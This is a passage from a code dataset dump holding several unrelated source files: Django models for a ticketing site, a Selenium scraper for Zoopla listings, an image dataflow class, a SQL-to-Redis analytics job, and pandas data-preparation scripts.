'ROMANCE'\n SUSPENSE = 'SUSPENSE'\n TERROR = 'TERROR'\n NA = 'NA'\n\n MOVIE_GENDER_OPTIONS = (\n (ANIMACAO, 'Animação'),\n (ACAO, 'Ação'),\n (BIOGRAFIA, 'Biografia'),\n (COMEDIA, 'Comédia'),\n (DOCUMENTARIO, 'Documentário'),\n (DRAMA, 'Drama'),\n (FICCAO, 'Ficção Científica'),\n (MUSICAL, 'Musical'),\n (NA, 'N/A'),\n (ROMANCE, 'Romance'),\n (SUSPENSE, 'Suspense'),\n (TERROR, 'Terror'),\n )\n\n synopsis = models.TextField(\n verbose_name=_('Sinopse'),\n help_text=_('Sinopse do Filme'),\n max_length=500,\n default=\"\"\n )\n\n diretor = models.CharField(\n verbose_name=_('Diretor'),\n help_text=_('Diretor do Filme'),\n max_length=255,\n default=\"\"\n )\n\n cast = models.TextField(\n verbose_name=_('Elenco'),\n help_text=_('Elenco participante do Filme'),\n max_length=500,\n default=\"\"\n )\n\n producer = models.CharField(\n verbose_name=_('Produtor'),\n help_text=_('Produtor do Filme'),\n max_length=255,\n default=\"\"\n )\n\n writer = models.CharField(\n verbose_name=_('Escritor'),\n help_text=_('Escritor do Filme'),\n max_length=255,\n default=\"\"\n )\n\n gender = models.CharField(\n verbose_name=_('Genêro'),\n help_text=_('Genêro do Filme'),\n choices=MOVIE_GENDER_OPTIONS,\n max_length=20,\n default=NA\n )\n\n trailer = models.CharField(\n verbose_name=_('Trailer'),\n help_text=_('Link do Trailer do Filme'),\n max_length=255,\n default=\"\"\n )\n\n def __str__(self):\n return self.spectacle.name\n\n 
def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n spectacle = Spectacle.objects.get(id=self.spectacle_id)\n self.name = spectacle.name\n self.status = spectacle.status\n if spectacle.poster:\n self.poster = spectacle.poster\n self.duration = spectacle.duration\n self.classification = spectacle.classification\n self.spectacle_type = spectacle.spectacle_type\n super(Movie, self).save()\n\n\nclass Play(SpectacleDecorator):\n class Meta:\n verbose_name = _(\"Peça Teatral\")\n verbose_name_plural = _(\"Peças Teatrais\")\n\n AUTO = 'AUTO'\n BURLESCO = 'BURLESCO'\n CIRCENSE = 'CIRCENSE'\n COMEDIA = 'COMEDIA'\n DRAMA = 'DRAMA'\n FARSA = 'FARSA'\n MIMICA = 'MIMICA'\n MUSICAL = 'MUSAICAL'\n OUTROS = 'OUTROS'\n TRAGEDIA = 'TRAGEDIA'\n TRAGICOMEDIA = 'TRAGICOMEDIA'\n\n PLAY_GENDER_OPTIONS = (\n (AUTO, 'Auto'),\n (BURLESCO, 'Burlesco'),\n (CIRCENSE, 'Circense'),\n (COMEDIA, 'Comédia'),\n (DRAMA, 'Drama'),\n (FARSA, 'Farsa'),\n (MIMICA, 'Mímica'),\n (MUSICAL, 'Musical'),\n (OUTROS, 'Outros'),\n (TRAGEDIA, 'Tragédia'),\n (TRAGICOMEDIA, 'Tragicomédia'),\n )\n\n synopsis = models.TextField(\n verbose_name=_('Sinopse'),\n help_text=_('Sinopse do Peça'),\n max_length=500,\n default=\"\"\n )\n\n diretor = models.CharField(\n verbose_name=_('Diretor'),\n help_text=_('Diretor do Peça'),\n max_length=255,\n default=\"\"\n )\n\n cast = models.TextField(\n verbose_name=_('Elenco'),\n help_text=_('Elenco participante do Peça'),\n max_length=500,\n default=\"\"\n )\n\n writer = models.CharField(\n verbose_name=_('Escritor'),\n help_text=_('Escritor do Peça'),\n max_length=255,\n default=\"\"\n )\n\n producer = models.CharField(\n verbose_name=_('Produtor'),\n help_text=_('Produtor do Peça'),\n max_length=255,\n default=\"\"\n )\n\n gender = models.CharField(\n verbose_name=_('Genêro'),\n help_text=_('Genêro do Peça'),\n choices=PLAY_GENDER_OPTIONS,\n max_length=15,\n default=OUTROS\n )\n\n def __str__(self):\n return self.spectacle.name\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n spectacle = Spectacle.objects.get(id=self.spectacle_id)\n self.name = spectacle.name\n self.status = spectacle.status\n if spectacle.poster:\n self.poster = spectacle.poster\n self.duration = spectacle.duration\n self.classification = spectacle.classification\n self.spectacle_type = spectacle.spectacle_type\n super(Play, self).save()\n\n\nclass Show(SpectacleDecorator):\n class Meta:\n verbose_name = _(\"Show\")\n verbose_name_plural = _(\"Shows\")\n\n band = models.CharField(\n verbose_name=_('Banda/Artista'),\n help_text=_('Nome da(o) Banda/Artista'),\n max_length=255,\n default=\"\"\n )\n\n tour = models.CharField(\n verbose_name=_('Turnê'),\n help_text=_('Nome da Turnê'),\n max_length=255,\n default=\"\"\n )\n\n description = models.TextField(\n verbose_name=_('Descrição do Show'),\n help_text=_('Descrição do Show'),\n max_length=500,\n default=\"\"\n )\n\n def __str__(self):\n show_name = self.spectacle.name\n show_band = self.band\n show_tour = self.tour\n\n return '{}: {} - {}'.format(\n show_name,\n show_band,\n show_tour\n )\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n spectacle = Spectacle.objects.get(id=self.spectacle_id)\n self.name = spectacle.name\n self.status = spectacle.status\n if spectacle.poster:\n self.poster = spectacle.poster\n self.duration = spectacle.duration\n self.classification = spectacle.classification\n self.spectacle_type = spectacle.spectacle_type\n super(Show, 
self).save()\n","sub_path":"ticketflix/spectacle/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345902740","text":"import os\nfrom distutils import dirname\n\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities\nfrom selenium.webdriver.remote.webdriver import WebDriver\n\n\ndef get_driver_instante() -> WebDriver:\n instance = webdriver.Chrome(options=webdriver.ChromeOptions(),\n executable_path=os.path.join(dirname(__file__), \"chromedriver\"),\n desired_capabilities=DesiredCapabilities.CHROME.copy())\n instance.implicitly_wait(2)\n instance.set_window_size(width=1024, height=768)\n return instance\n\n\ndef build_zoompla_url(bed=2, price_max=290000, price_min=240000, radius=1) -> str:\n return \"https://www.zoopla.co.uk/for-sale/houses/london/?\" \\\n \"is_auction=false\" \\\n \"&beds_min={}\" \\\n \"&feature=has_parking_garage\" \\\n \"&is_retirement_home=false\" \\\n \"&is_shared_ownership=false\" \\\n \"&price_max={}\" \\\n \"&price_min={}\" \\\n \"&q=London\" \\\n \"&radius={}\" \\\n \"&results_sort=newest_listings\" \\\n \"&search_source=facets\".format(bed, price_max, price_min, radius)\n\n\ndef write_html_file(source):\n path = os.path.join(dirname(__file__), \"index.html\")\n with open(path, 'w') as file:\n file.write(source)\n file.close()\n\ndef parse_html(result) -> str:\n html = \"\"\n for entry in result:\n html += \"\".format(entry)\n html += \"
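# A hedged, Django-free sketch of the save() overrides above, where every
# SpectacleDecorator subclass copies shared fields from its parent
# Spectacle before saving. The field names come from the models; the helper
# itself is hypothetical.
from types import SimpleNamespace

SYNCED_FIELDS = ('name', 'status', 'duration', 'classification', 'spectacle_type')

def sync_from_parent(child, parent):
    for field in SYNCED_FIELDS:
        setattr(child, field, getattr(parent, field))
    if getattr(parent, 'poster', None):  # poster is only copied when set
        child.poster = parent.poster
    return child

parent = SimpleNamespace(name='Dune', status='EMCARTAZ', duration=155,
                         classification='14ANOS', spectacle_type='FILME', poster=None)
child = sync_from_parent(SimpleNamespace(), parent)
print(child.name, child.duration)  # Dune 155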
{}
\"\n return html\n\n\ndef scrape_zoompla(driver: WebDriver):\n paginator_loc = \"//div[contains(@class, 'paginate')]\"\n page_next_loc = \".//a[text()='Next']\"\n list_loc = \"//ul[contains(@class, 'listing-results')]\"\n list_entry_loc = 'li'\n\n url = build_zoompla_url(bed=2, price_max=290000, price_min=240000)\n print(\"Accessing website: {}\".format(url))\n driver.get(url)\n\n result = []\n\n # First to n-1 page\n while ('Next' in driver.find_element_by_xpath(paginator_loc).text):\n list = driver.find_element_by_xpath(list_loc)\n entries = list.find_elements_by_tag_name(list_entry_loc)\n for entry in entries:\n if entry.text != '':\n result.append(entry.text)\n driver.find_element_by_xpath(paginator_loc).find_element_by_xpath(page_next_loc).click()\n\n # Last page only\n list = driver.find_element_by_xpath(list_loc)\n entries = list.find_elements_by_tag_name(list_entry_loc)\n for entry in entries:\n if entry.text != '':\n result.append(entry.text)\n return result\n\n\nif __name__ == '__main__':\n print(\"Starting scrapper\")\n driver = get_driver_instante()\n try:\n result = scrape_zoompla(driver)\n print(\"Scrapper finished, writing output file\")\n write_html_file(parse_html(result))\n except Exception as e:\n print(\"Failed, writing scrapped HTML page:\\n\" + str(e))\n write_html_file(driver.page_source)\n finally:\n driver.quit()\n","sub_path":"scrapeit.py","file_name":"scrapeit.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"235644019","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# File: sun09.py\n# Author: Akanksha Saran \n\nimport os\nimport gzip\nimport numpy as np\nfrom six.moves import range, zip, map\nimport cv2\n\nfrom tensorpack.utils import logger\nfrom tensorpack.utils.fs import download, get_dataset_path\nfrom tensorpack.utils.timer import timed_operation\nfrom tensorpack.dataflow.base import RNGDataFlow\n\n__all__ = ['sun09']\n\nclass SUN09(RNGDataFlow):\n \"\"\"\n Produces [image, label] in MNIST dataset,\n image is 28x28 in the range [0,1], label is an int.\n \"\"\"\n\n def __init__(self, pathfile, train_or_test, shuffle=False):\n \"\"\"\n Args:\n train_or_test (str): either 'train' or 'test'\n shuffle (bool): shuffle the dataset\n \"\"\"\n assert os.path.isfile(pathfile)\n assert train_or_test in ['train', 'test']\n self.name = train_or_test\n self.shuffle = shuffle\n\n imgs_labels = [line.rstrip('\\n') for line in open(pathfile,'r')]\n self.imglist = [img_label.split('\\t') for img_label in imgs_labels]\n \n \n self.images = []\n self.labels = []\n idxs = np.arange(len(self.imglist))\n if self.shuffle:\n self.rng.shuffle(idxs)\n for k in idxs:\n #print(self.imglist[k])\n fname, label = self.imglist[k]\n #if int(label)==0:\n # print(fname,label)\n im = cv2.imread(fname, cv2.IMREAD_COLOR)\n assert im is not None, fname\n if im.ndim == 2:\n im = np.expand_dims(im, 2).repeat(3,2)\n im = cv2.resize(im,(224,224))\n self.images.append(im)\n self.labels.append(int(label))\n #print('*****')\n #print(self.images[0].shape)\n\n\n def size(self):\n return len(self.imglist)\n\n def get_data(self):\n idxs = np.arange(len(self.imglist))\n if self.shuffle:\n self.rng.shuffle(idxs)\n\n for k in idxs:\n fname, label = self.imglist[k]\n\n im = cv2.imread(fname, cv2.IMREAD_COLOR)\n assert im is not None, fname\n if im.ndim == 2:\n im = np.expand_dims(im, 2).repeat(3, 2)\n yield [im, int(label)]\n\nif __name__ == '__main__':\n ds = 
SUN09('/home/asaran/research/tensorpack/examples/SimilarityLearning/data/train.txt', 'train',\n shuffle=False)\n ds.reset_state()\n for k in ds.get_data():\n from IPython import embed\n embed()\n break\n","sub_path":"examples/SimilarityLearning/utils/sun09.py","file_name":"sun09.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"653979620","text":"#encoding:utf-8\nfrom django.db import models\n\nfrom tinymce.models import HTMLField\nimport datetime\n\nclass Categoria(models.Model):\n\tnombre = models.CharField(max_length=16, verbose_name='Nombre de la categoria', help_text='Poner el nombre en minusculas y en singular [se usa para poner en la URL, por ejemplo /chisme, /noticia, /tip, etc] ')\n\n\tdef __str__(self):\n\t\treturn self.nombre\n\nclass Publicacion(models.Model):\n\ttitulo = models.CharField(max_length=48, help_text='Titulo de la publicacion, maximo 48 caracteres')\n\timagen = models.ImageField(upload_to='publicaciones/portadas', verbose_name='Imagen principal', help_text='Da a entender el tipo contenido de la publicacion. Esta aparecera en la pagina principal del sitio si se marca la opcion -En portada- ')\n\tparrafo_principal = models.TextField(max_length=250, help_text='Debe ser preciso y corto (maximo 250 caracteres), aparecera como el texto de enganche para los usuarios')\n\tcuerpo = HTMLField(help_text='Cuerpo principal de la entrada')\n\t#tipo_publicacion = models.CharField(max_length=15, choices=TIPOS_DE_PUBLICACION, default=\"publicacion\")\n\ttipo_publicacion = models.ForeignKey(Categoria)\n\tfecha_creacion = models.DateTimeField(auto_now_add=True)\n\tfecha_publicacion = models.DateTimeField('Fecha de publicacion', help_text='Indica la fecha en la cual la publicacion aparecera automaticamente [Tambien debe estar marcada la opcion \"Listo para publicar para que sea valido\"]')\n\tfecha_expiracion = models.DateTimeField('Fecha de expiracion', help_text='Fecha de vence la promocion/publicacion')\n\t\n\ten_portada = models.BooleanField(default=False, help_text='Debe aparecer en la pagina principal del sitio?')\n\tlisto_para_publicar = models.BooleanField(default=False, help_text='Hasta que no este marcada esta opcion nunca se mostrara esta publicacion')\n\t\n\tdef __str__(self):\n\t\treturn self.titulo","sub_path":"apps/publicaciones/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"611237041","text":"#coding=utf-8\nfrom conf import config\nfrom utils import dateUtils\nfrom log import get_logger\nfrom utils.odps_init import odps_uxin_init\nfrom utils.redisUtils import redisUtils\n# from apscheduler.schedulers.blocking import BlockingScheduler\n\n\n\n\ndef get_hot_list_uid():\n logger = get_logger(\"\")\n # 初始化odps\n odps = odps_uxin_init()\n last_month = dateUtils.get_last_month()\n\n\n # 条件二:上月总付费人数不低于E的主播开播,E=200人(去重)\n fee_num_E_sql=\"\"\"\n select \n uid\n from\n (select \n uid,fee_uid_num\n from\n (select\n uid,\n count(distinct send_id) as fee_uid_num\n from live_account_trans_detail_d \n where app_id = '0' and create_time is not null\n and substr(create_time,1,7) = '%s'\n and (trans_type = 17 or trans_type = 1 or trans_type = 5 or trans_type = 8 or trans_type = 14\n or trans_type = 19 or trans_type = 15 or trans_type = 40)\t\n group by uid)t1\n where fee_uid_num > '%d'\n )tt1\n \"\"\"%(last_month,config.E)\n\n # 
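# A hedged sketch of the grayscale-to-RGB promotion used in SUN09 above,
# where 2-D images get a channel axis and are repeated three times. The
# synthetic array below stands in for a cv2.imread() result.
import numpy as np

gray = np.zeros((28, 28), dtype=np.uint8)    # H x W, no channel axis
rgb = np.expand_dims(gray, 2).repeat(3, 2)   # H x W x 3, as the loader does
print(rgb.shape)  # (28, 28, 3)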
条件五:上月收入不低于C的主播开播,C=1w(自然月or最近30天)(C本身只看流水,包含钻石和人民币)\n income_C_sql=\"\"\"\n select\n uid\n from\n (select\n uid,\n sum(diamond + amount) as income\n from live_account_trans_detail_d\n where app_id = '0' and create_time is not null\n and substr(create_time,1,7) = '%s'\n and (trans_type = 17 or trans_type = 1 or trans_type = 5 or trans_type = 8 or trans_type = 14\n or trans_type = 19 or trans_type = 15 or trans_type = 40)\n group by uid)t1\n where income > '%d'\n \"\"\"%(last_month,config.C)\n\n # 条件六:上月总观众数不低于D的主播开播,D=5k(天与天不去重)\n viewer_num_D_sql=\"\"\"\n select \n anchor_uid as uid\n from\n (select \n anchor_uid,viewer_num\n from\n (select \n cast (anchor_uid as bigint) as anchor_uid,\n sum(viewer_num) as viewer_num \n from\n (select \n anchor_uid,\n dt,\n count(distinct uid) as viewer_num\n from uxin_db_bc.bds_live_room_uid_view_info_d \n where substr(dt,1,7) = '%s'\n group by anchor_uid,dt)t1\n group by anchor_uid)tt1\n where viewer_num > '%d')tt1\n \"\"\"%(last_month,config.D)\n\n logger.info(\"要执行的付费人数为门槛的sql \"+fee_num_E_sql)\n logger.info(\"要执行的收入为门槛的sql \" + income_C_sql)\n logger.info(\"要执行的观看人数为门槛的sql \" + viewer_num_D_sql)\n\n # 异步方式执行\n instance_fee_num = odps.run_sql(fee_num_E_sql)\n # 获取日志地址\n logview_fee_num = instance_fee_num.get_logview_address()\n logger.info(logview_fee_num)\n\n instance_income = odps.run_sql(income_C_sql)\n logview_income = instance_income.get_logview_address()\n logger.info(logview_income)\n\n instance_viewer_num = odps.run_sql(viewer_num_D_sql)\n logview_viewer_num = instance_viewer_num.get_logview_address()\n logger.info(logview_viewer_num)\n\n # 阻塞直到完成\n instance_fee_num.wait_for_success()\n instance_income.wait_for_success()\n instance_viewer_num.wait_for_success()\n\n # 获得付费人数为门槛的sql的结果\n fee_num_uid_list = set()\n if (instance_fee_num.is_successful()):\n logger.info(\"付费人数限为门槛的sql执行成功!\")\n with instance_fee_num.open_reader() as reader:\n for record in reader:\n fee_num_uid_list.add(dict(record)[\"uid\"])\n logger.info(\"付费人数限为门槛的sql执行结果为%d条记录!\"%(len(fee_num_uid_list)))\n else:\n logger.info(\"付费人数限为门槛的sql执行失败!\")\n\n\n # 获得收入为门槛的sql的结果\n income_uid_list = set()\n if (instance_income.is_successful()):\n logger.info(\"收入限为门槛的sql执行成功!\")\n with instance_income.open_reader() as reader:\n for record in reader:\n income_uid_list.add(dict(record)[\"uid\"])\n logger.info(\"收入限为门槛的sql执行结果为%d条记录!\" % (len(income_uid_list)))\n else:\n logger.info(\"收入限为门槛的sql执行失败!\")\n\n\n viewer_num_uid_list = set()\n if (instance_viewer_num.is_successful()):\n logger.info(\"观众数限为门槛的sql执行成功!\")\n with instance_viewer_num.open_reader() as reader:\n for record in reader:\n viewer_num_uid_list.add(dict(record)[\"uid\"])\n logger.info(\"观众数限为门槛的sql执行结果为%d条记录!\" % (len(viewer_num_uid_list)))\n else:\n logger.info(\"观众数限为门槛的sql执行失败!\")\n\n return fee_num_uid_list,income_uid_list,viewer_num_uid_list\n\n\ndef insert2redis():\n fee_num_uid_list, income_uid_list, viewer_num_uid_list = get_hot_list_uid()\n redisutil = redisUtils()\n for uid in fee_num_uid_list:\n redisutil.sadd(config.fee_uid_key,uid)\n for uid in income_uid_list:\n redisutil.sadd(config.income_key,uid)\n for uid in viewer_num_uid_list:\n redisutil.sadd(config.viewer_key,uid)\n\n\n\n\nif __name__ == \"__main__\":\n # scheduler = BlockingScheduler()\n # # scheduler.add_job(insert2redis, \"cron\", day = 19,hour = 15) ##每天正点执行\n # scheduler.add_job(insert2redis, 'interval', minutes = 1) ## 一分钟间隔执行\n # scheduler.start()\n 
insert2redis()\n","sub_path":"hot_live_anchor/hot_list_anchor.py","file_name":"hot_list_anchor.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"463092919","text":"# -*- coding: utf-8 -*- \n# @Time : 2021/1/4 13:52 \n# @Author : 张丽雯 \n# @File : test_Declarationcase.py \n# @中文描述 : 生产声明\n\nimport sys\nimport pytest\nfrom DataApp.WodeclarationData import *\nfrom src.pageobjectAPP.pageWodeclaration import *\nfrom src.public.common.Close_current_tab import *\nfrom src.public.common.Search_Item import *\n\n\nclass Test_Declarat:\n def setup_class(self):\n app_login(username, password)\n login_Declaration()\n\n def teardown_class(self):\n Close_current_tab()\n app_logout()\n\n # 选择要声明的工单\n def test_wo_search(self):\n log.info(\"开始执行用例%s\" % sys._getframe().f_code.co_name)\n search_item('编码','WO00000065')\n assert new_page_source('WO00000065')\n # 生产声明\n def test_Declaration(self):\n log.info(\"开始执行用例%s\" % sys._getframe().f_code.co_name)\n declaration(num, Cnumber)\n sleep(10)\n # assert \"保存成功\" in new_get_text(alert_txt)\n","sub_path":"TestcaseApp/Workorder/test_wodeclaration.py","file_name":"test_wodeclaration.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290048148","text":"from math import sqrt\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pydataset import data\nimport statistics\nimport acquire\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.impute import KNNImputer\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\ndef clean_iris(df):\n df = df.drop(columns = ['species_id'])\n df = df.rename(columns={\"species_name\": \"species\"})\n df_dummy = pd.get_dummies(df['species'], drop_first=True)\n df= pd.concat([df, df_dummy], axis = 1)\n return df\n\ndef split_iris_data(df):\n \"\"\"\n splits the data in train validate and test \n \"\"\"\n train, test = train_test_split(df, test_size = 0.2, random_state = 123, stratify = df.species)\n train, validate = train_test_split(train, test_size=.3, random_state=123, stratify=train.species)\n \n return train, validate, test\n\ndef prep_irs_data(df):\n \"\"\"\n takes in a data from titanic database, cleans the data, splits the data\n in train validate test and imputes the missing values for embark_town. 
\n Returns three dataframes train, validate and test.\n \"\"\"\n df = clean_iris(df)\n train, validate, test = split_iris_data(df)\n #train, validate, test = impute_mode(train, validate, test) #nothing to impute\n return train, validate, test\n\n\n\ndef clean_telco(df):\n\n df = acquire.get_telco_data() # grabbing the telco data\n df = df.drop_duplicates() # Dropping Duplicates\n df = df.drop(columns = ['customer_id']) # Don't need this column\n \n # If total charges are null, then remove the entire row \n list_of_null_indexs = list(df[df.total_charges.str.contains(\" \")].index)\n df = df.drop(list_of_null_indexs)\n \n # Convert total_charges from datatype object to float\n total_charges = df.total_charges.astype(\"float\")\n df = df.drop(columns='total_charges')\n df = pd.concat([df, total_charges], axis = 1)\n \n # In the three lines below are mapping out the current values for what they actually represent.\n payment = df.payment_type_id.map({1: 'Electronic check', 2: 'Mailed check', 3:'Bank transder', 4:'Credit card'})\n internet = df.internet_service_type_id.map({1: 'DSL', 2: 'Fiber optic', 3:'None'})\n contract = df.contract_type_id .map({1: 'Month-to-month', 2: 'One year', 3:'Two year'})\n \n # In the three lines below im adding each series to my dataframe and renaming the columns\n df = pd.concat([df, payment.rename(\"payment\")], axis = 1)\n df = pd.concat([df, internet.rename(\"internet_service\")], axis = 1)\n df = pd.concat([df, contract.rename(\"contract\")], axis = 1)\n \n df = df.drop(columns=['payment_type_id','contract_type_id', 'internet_service_type_id']) # Dropping old columns\n \n boolean = df.nunique()[df.nunique() <= 2].index # boolean is a list of columns who's values are either true/false or 1/0\n\n # In the line below, I am making dummies for all the boolean columns. Dropping the first so I dont get two columns back\n boolean_dummy = pd.get_dummies(df[boolean], drop_first=[True, True, True, True, True, True, True])\n \n \n df = pd.concat([df, boolean_dummy], axis = 1) # Adding my encoded boolean_dummy DataFrame back to my original Data Frame\n df = df.drop(columns=boolean) # Dropping the none encoded columns\n \n # In the line below, I am grabbing all the categorical columns(that are greater than 2) and saving the values into categ as a list\n categ = df.nunique()[(df.nunique() > 2) & (df.nunique() < 5)].index\n categ_dummy = pd.get_dummies(df[categ]) # Grabbing dummies, this time dont drop the first columns.\n \n \n df = pd.concat([df, categ_dummy], axis = 1) # Adding my encoded categ_dummy DataFrame back to my original Data Frame\n df = df.drop(columns=categ) # Dropping the none encoded columns\n \n df = df.rename(columns={'churn_Yes': 'churn'})\n return df\n\ndef split_telco_data(df):\n \n train, test = train_test_split(df, test_size = 0.2, random_state = 123, stratify = df.churn)\n train, validate = train_test_split(train, test_size=.3, random_state=123, stratify=train.churn)\n \n return train, validate, test\n\ndef prep_telco_data(df):\n \"\"\"\n takes in a data from titanic database, cleans the data, splits the data\n in train validate test and imputes the missing values for embark_town. 
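# A hedged toy run of the two encoding steps in clean_telco() above:
# Series.map() to decode the *_type_id columns, then pd.get_dummies() for
# one-hot indicators. The frame below is made up.
import pandas as pd

df = pd.DataFrame({'contract_type_id': [1, 2, 3, 1]})
df['contract'] = df.contract_type_id.map(
    {1: 'Month-to-month', 2: 'One year', 3: 'Two year'})
print(pd.get_dummies(df['contract']))  # one indicator column per contract type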
\n Returns three dataframes train, validate and test.\n \"\"\"\n df = clean_telco(df)\n train, validate, test = split_telco_data(df)\n #train, validate, test = impute_mode(train, validate, test) #nothing to impute no missing values\n return train, validate, test\n\n############## Titanic ##################\n\ndef clean_titanic(df):\n '''\n This function will drop any duplicate observations, \n drop columns not needed, fill missing embarktown with 'Southampton'\n and create dummy vars of sex and embark_town. \n '''\n df.drop_duplicates(inplace=True)\n df.drop(columns=['deck', 'embarked', 'class'], inplace=True)\n df.embark_town.fillna(value='Southampton', inplace=True)\n dummy_df = pd.get_dummies(df[['sex', 'embark_town']], drop_first=False)\n df = df.drop(columns=['passenger_id'])\n return pd.concat([df, dummy_df], axis=1)\n\n\ndef split_titanic_data(df):\n \"\"\"\n splits the data in train validate and test \n \"\"\"\n train, test = train_test_split(df, test_size = 0.2, random_state = 123, stratify = df.survived)\n train, validate = train_test_split(train, test_size=.25, random_state=123, stratify=train.survived)\n \n return train, validate, test\n\ndef impute_mode(train, validate, test):\n '''\n impute mode for embark_town\n '''\n \n imputer = KNNImputer(n_neighbors=2)\n train[['age']] = imputer.fit_transform(train[['age']])\n validate[['age']] = imputer.fit_transform(validate[['age']])\n test[['age']] = imputer.fit_transform(test[['age']])\n\n imputer = SimpleImputer(strategy='most_frequent')\n train[['embark_town']] = imputer.fit_transform(train[['embark_town']])\n validate[['embark_town']] = imputer.transform(validate[['embark_town']])\n test[['embark_town']] = imputer.transform(test[['embark_town']])\n return train, validate, test\n\ndef prep_titanic_data(df):\n \"\"\"\n takes in a data from titanic database, cleans the data, splits the data\n in train validate test and imputes the missing values for embark_town. \n Returns three dataframes train, validate and test.\n \"\"\"\n df = clean_titanic(df)\n train, validate, test = split_titanic_data(df)\n train, validate, test = impute_mode(train, validate, test)\n\n #last min clean ups\n train.drop(columns=['sex', 'embark_town', 'sex_female'], inplace=True)\n validate.drop(columns=['sex', 'embark_town', 'sex_female'], inplace=True)\n test.drop(columns=['sex', 'embark_town', 'sex_female'], inplace=True)\n return train, validate, test","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"87888559","text":"bedrag = int(input('Geef bedrag tussen 0 en 500 eurocent: '))\nbetaling = ''\nrestbedrag = bedrag\n\nfor munt in 200, 100, 50, 20, 10, 5, 2, 1:\n aantal = restbedrag // munt\n restbedrag = restbedrag % munt\n\n if aantal > 0:\n betaling = betaling + str(aantal) + ' x ' + str(munt) + '\\n'\n\nprint(betaling)\n","sub_path":"Opdrachten/Opdracht5.py","file_name":"Opdracht5.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"640026208","text":"#! 
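# A hedged demonstration of the two-stage stratified split the
# split_*_data helpers above perform: an 80/20 train/test cut, then a
# second stratified cut of the training set. Assumes scikit-learn and
# pandas; the frame is synthetic.
import pandas as pd
from sklearn.model_selection import train_test_split

df = pd.DataFrame({'x': range(100), 'y': [0, 1] * 50})
train, test = train_test_split(df, test_size=0.2, random_state=123, stratify=df.y)
train, validate = train_test_split(train, test_size=0.3, random_state=123,
                                   stratify=train.y)
print(len(train), len(validate), len(test))  # 56 24 20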
/usr/bin/env python\n\n# <>\n# Copyright (c) 2016, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by the LLNL Nuclear Data and Theory group\n# (email: mattoon1@llnl.gov)\n# LLNL-CODE-683960.\n# All rights reserved.\n# \n# This file is part of the FUDGE package (For Updating Data and \n# Generating Evaluations)\n# \n# When citing FUDGE, please use the following reference:\n# C.M. Mattoon, B.R. Beck, N.R. Patel, N.C. Summers, G.W. Hedstrom, D.A. Brown, \"Generalized Nuclear Data: A New Structure (with Supporting Infrastructure) for Handling Nuclear Data\", Nuclear Data Sheets, Volume 113, Issue 12, December 2012, Pages 3145-3171, ISSN 0090-3752, http://dx.doi.org/10.1016/j.nds.2012.11.008\n# \n# \n# Please also read this link - Our Notice and Modified BSD License\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the disclaimer below.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the disclaimer (as noted below) in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of LLNS/LLNL nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY, LLC,\n# THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n# \n# Additional BSD Notice\n# \n# 1. This notice is required to be provided under our contract with the U.S.\n# Department of Energy (DOE). This work was produced at Lawrence Livermore\n# National Laboratory under Contract No. DE-AC52-07NA27344 with the DOE.\n# \n# 2. Neither the United States Government nor Lawrence Livermore National Security,\n# LLC nor any of their employees, makes any warranty, express or implied, or assumes\n# any liability or responsibility for the accuracy, completeness, or usefulness of any\n# information, apparatus, product, or process disclosed, or represents that its use\n# would not infringe privately-owned rights.\n# \n# 3. Also, reference 